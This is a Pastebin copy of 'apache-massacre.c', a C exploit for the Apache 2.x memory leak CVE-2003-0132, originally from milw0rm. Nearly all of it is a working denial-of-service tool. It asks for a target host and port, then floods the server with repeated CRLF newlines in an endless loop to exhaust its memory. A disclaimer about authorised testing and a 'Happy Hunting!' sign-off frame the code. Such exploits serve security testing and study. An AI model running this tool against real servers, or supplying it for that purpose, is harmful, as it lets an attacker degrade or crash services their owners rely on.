Advertisement
FlyFar

Apache 2.x - Memory Leak - CVE-2003-0132

Jan 24th, 2024
494
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.05 KB | Cybersecurity | 0 0
  1. /* apache-massacre.c
  2. * Test code for Apache 2.x Memory Leak
  3. * By Matthew Murphy
  4. *
  5. * DISCLAIMER: This exploit tool is provided only to test networks for a
  6. * known vulnerability. Do not use this tool on systems you do not control,
  7. * and do not use this tool on networks you do not own without appropriate
  8. * consent from the network owner. You are responsible for any damage your
  9. * use of the tool causes. In no event may the author of this tool be held
  10. * responsible for damages relating to its use.
  11. *
  12. * As with most Apache exposures, the impacts vary between ports of the server:
  13. *
  14. * Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected
  15. * by this, as Apache's child process doesn't terminate normally unless the
  16. * parent process stops. This means that leaks (and any performance loss) hang
  17. * around until Apache is restarted.
  18. *
  19. * Unix/mpm_prefork: This MPM offers the most protection against successful
  20. * exploitation, as its processes exit at the end of the request.
  21. *
  22. * Unix/other MPMs: These other MPMs utilize multiple Apache processes for
  23. * multiple Apache requests. Depending on the MPM in use and the traffic rates
  24. * of the server, this may be used to the advantage of a potential attacker.
  25. * If multiple different Apache processes are utilized, an attacker can spread
  26. * the substantial leak between processes to dodge resource limits imposed on
  27. * httpd's UID (usually nobody, www, or apache)
  28. *
  29. * Credit: iDEFENSE reported this issue to several security lists on April 8,
  30. * 2003 following the Apache release announcement. Apache fixed the flaw about
  31. * a month after the initial disclosure of this vulnerability. iDEFENSE credits
  32. * the discovery of this vulnerability to an anonymous researcher.
  33. *
  34. * Happy Hunting!
  35. */
  36.  
  37. #ifndef _WIN32
  38. #include <netdb.h>
  39. #include <sys/types.h>
  40. #include <sys/socket.h>
  41. #include <sys/wait.h>
  42. #include <sys/stat.h>
  43. #include <sys/time.h>
  44. #include <netinet/in.h>
  45. #include <fcntl.h>
  46. #else
  47. #include <windows.h>
  48. #pragma comment(lib, "wsock32.lib")
  49. #endif
  50. #include <stdlib.h>
  51. #include <stdio.h>
  52.  
  53. int sig_fired = 0;
  54.  
  55. #ifndef _WIN32
  56. void sig_handler(int sig) {
  57. #else
  58. BOOL WINAPI sig_handler(DWORD dwCtrlType) {
  59. #endif
  60. sig_fired = 1;
  61. #ifndef _WIN32
  62. return;
  63. #else
  64. return TRUE;
  65. #endif
  66. }
  67.  
  68. int main(int argc, char *argv[]) {
  69. SOCKET s;
  70. struct sockaddr_in sin;
  71. char buffer[1025];
  72. struct hostent *he;
  73. unsigned short iPort = 80;
  74. int newlines = 100;
  75. char *p;
  76. char *p2;
  77. int i;
  78. #ifdef _WIN32
  79. WSADATA wsa_prov;
  80. #endif
  81. printf("Apache Massacre v1.0\r\n");
  82. printf("Exploit by Matthew Murphy\r\n");
  83. printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n");
  84. #ifdef _WIN32
  85. if (WSAStartup(0x0101, &wsa_prov)) {
  86. perror("WSAStartup");
  87. exit(1);
  88. }
  89. #endif
  90. printf("Please enter the web server's host/IP: ");
  91. fgets(&buffer[0], 1024, stdin);
  92. he = gethostbyname(&buffer[0]);
  93. if (!he) {
  94. perror("gethostbyname");
  95. exit(1);
  96. }
  97. sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
  98. printf("Please enter the web server's port: ");
  99. fgets(&buffer[0], 1024, stdin);
  100. iPort = (unsigned short)atoi(&buffer[0]);
  101. #ifndef _WIN32
  102. #ifdef _SOLARIS
  103. sigset(SIGINT, &sig_handler);
  104. #else
  105. signal(SIGINT, &sig_handler);
  106. #endif
  107. #else
  108. SetConsoleCtrlHandler(&sig_handler, TRUE);
  109. #endif
  110. printf("How many newlines should be in each request [100]: ");
  111. fgets(&buffer[0], 1024, stdin);
  112. if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) {
  113. newlines = atoi(&buffer[0]);
  114. }
  115. p = malloc(newlines*2);
  116. p2 = p;
  117. for (i = 0; i < newlines; i++) {
  118. *p2 = 0x0D;
  119. p2++;
  120. *p2 = 0x0A;
  121. p2++;
  122. }
  123. newlines += newlines;
  124. s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  125. if (s < 0) {
  126. perror("socket");
  127. exit(1);
  128. }
  129. sin.sin_family = AF_INET;
  130. sin.sin_port = htons(iPort);
  131. if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) {
  132. perror("connect");
  133. exit(1);
  134. }
  135. while (1) {
  136. if (!send(s, (char *)p, newlines, 0) == newlines) {
  137. perror("send");
  138. exit(1);
  139. }
  140. if (sig_fired) {
  141. printf("Terminating on SIGINT");
  142. free(p);
  143. #ifndef _WIN32
  144. close(s);
  145. #else
  146. closesocket(s);
  147. WSACleanup();
  148. #endif
  149. exit(0);
  150. }
  151. }
  152. }
  153.  
  154.  
  155. // milw0rm.com [2003-04-09]
  156.      
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement